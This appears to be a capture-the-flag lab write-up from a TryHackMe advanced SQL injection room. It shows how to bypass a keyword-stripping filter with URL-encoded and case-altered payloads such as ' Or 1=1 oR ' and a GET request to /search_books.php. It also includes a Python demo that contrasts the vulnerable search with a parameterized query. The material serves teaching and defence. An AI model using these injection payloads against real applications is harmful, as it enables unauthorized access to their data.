TryHackMe Advanced SQL Injection
Last updated
Given the simple SQL query performed on the server (of the form SELECT * FROM books WHERE book_name = '<input>', as the payload examples below show):
We can attempt to trick the system into returning more information than intended by injecting the following payload:
The following code snippet shows a simple SQLi prevention mechanism in which the application simply removes a few important keywords from the input:
Thus, the final SQL command no longer works, because the OR keyword is removed. However, this filter can easily be bypassed by methods such as URL encoding the payload or obfuscating the keywords.
URL encode
The payload is built from the following pieces:
- ' : closes the current string value
- || : substitute for OR
- 1=1 : always true
- -- : SQL comment, forcing the database to ignore the rest of the query
- + : adds a space after the comment to ensure that it is properly terminated
The URL encoded format is as follows: %27%20%7C%7C%201=1%20--+
To avoid any further formatting issues, we can inspect the HTTP request the search form makes and insert the payload into it directly. In this example, each search issues a GET request to /search_books.php?book_name=<payload>.
Thus, sending a GET request to /search_books.php?book_name=%27%20%7C%7C%201=1%20--+ retrieves a list of all books in the table.
Obfuscating the keywords
Keyword obfuscation changes the capitalization of a keyword, or substitutes an equivalent operator, so that a filter matching the exact keyword no longer recognises it:
Eg. OR -> oR, Or
OR -> ||
The following presents a few payloads we can use to bypass the filter mechanism:
- ' Or '1=1 -> SELECT * FROM books WHERE book_name = '' Or '1=1'
- ' Or 1=1 oR ' -> SELECT * FROM books WHERE book_name = '' Or 1=1 oR ''
- ' Or 1=1-- -> SELECT * FROM books WHERE book_name = '' Or 1=1-- ' (take note of the space after the comment, --)
- ' || '1=1 -> SELECT * FROM books WHERE book_name = '' || '1=1' (replacing OR with || works too)
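The following is an added example, not code from the TryHackMe room: it models the keyword-stripping filter described above (assumed to delete a fixed list of keywords case-sensitively, since the room's own snippet is not shown here) in front of a string-concatenated query, runs the capitalization payloads from the list against a constructed in-memory SQLite table, and contrasts the result with a parameterized query, which also stops the filter mangling legitimate titles. SQLite treats || as string concatenation rather than OR (that substitution is MySQL behaviour), so the || payloads are left out here.

```python
import sqlite3

# Constructed sample table; the titles are not from the original room.
BOOKS = ["Hacking Exposed", "NETWORK SECURITY", "Secure Coding"]

def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (book_name TEXT)")
    conn.executemany("INSERT INTO books VALUES (?)", [(b,) for b in BOOKS])
    return conn

def naive_filter(value):
    # Assumed shape of the room's prevention mechanism: a few keywords are
    # deleted case-sensitively and nothing else is done to the input, so
    # "Or" and "oR" survive untouched.
    for keyword in ("OR", "AND", "UNION", "SELECT"):
        value = value.replace(keyword, "")
    return value

def search_vulnerable(conn, book_name):
    # Filter-then-concatenate: the input still becomes part of the SQL text.
    sql = "SELECT book_name FROM books WHERE book_name = '%s'" % naive_filter(book_name)
    return [row[0] for row in conn.execute(sql)]

def search_parameterized(conn, book_name):
    # Bound parameter: the driver keeps the value out of the SQL text, so
    # no keyword list is needed and no legitimate title is damaged.
    sql = "SELECT book_name FROM books WHERE book_name = ?"
    return [row[0] for row in conn.execute(sql, (book_name,))]

def demo():
    conn = setup_db()
    results = {}
    for payload in ("' Or 1=1 oR '", "' Or 1=1-- "):
        results[payload] = (search_vulnerable(conn, payload),
                            search_parameterized(conn, payload))
    # Collateral damage: the filter deletes "OR" inside a legitimate title,
    # so the filtered search cannot find it while the parameterized one can.
    legit = "NETWORK SECURITY"
    results[legit] = (search_vulnerable(conn, legit), search_parameterized(conn, legit))
    return results

if __name__ == "__main__":
    for query, (filtered, bound) in demo().items():
        print("%r: filtered+concatenated -> %s, parameterized -> %s" % (query, filtered, bound))
```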
We can URL encode the following payload using the tool: